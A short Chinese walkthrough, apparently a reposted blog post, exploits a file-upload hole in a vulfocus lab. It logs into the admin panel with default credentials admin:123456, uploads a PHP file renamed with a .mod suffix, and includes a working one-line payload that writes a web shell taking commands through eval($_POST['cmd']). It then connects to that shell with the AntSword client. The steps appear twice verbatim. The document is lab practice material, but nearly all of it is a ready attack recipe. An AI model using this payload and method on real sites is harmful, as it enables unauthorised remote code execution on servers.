漏洞环境:vulfocus
到管理后台
使用用户名密码:admin:123456登录,然后到后台找到文件上传点
发现需要后缀名为.mod
创建生成一句话木马的php脚本,并添加.mod后缀名,然后提交
<?php file_put_contents("shell.php","<?php phpinfo();eval(\$_POST['cmd']);?>");?>
访问
然后就可以用蚁剑连接
漏洞环境:vulfocus
到管理后台
使用用户名密码:admin:123456登录,然后到后台找到文件上传点
发现需要后缀名为.mod
创建生成一句话木马的php脚本,并添加.mod后缀名,然后提交
<?php file_put_contents("shell.php","<?php phpinfo();eval(\$_POST['cmd']);?>");?>
访问
然后就可以用蚁剑连接
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/634941.html
如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!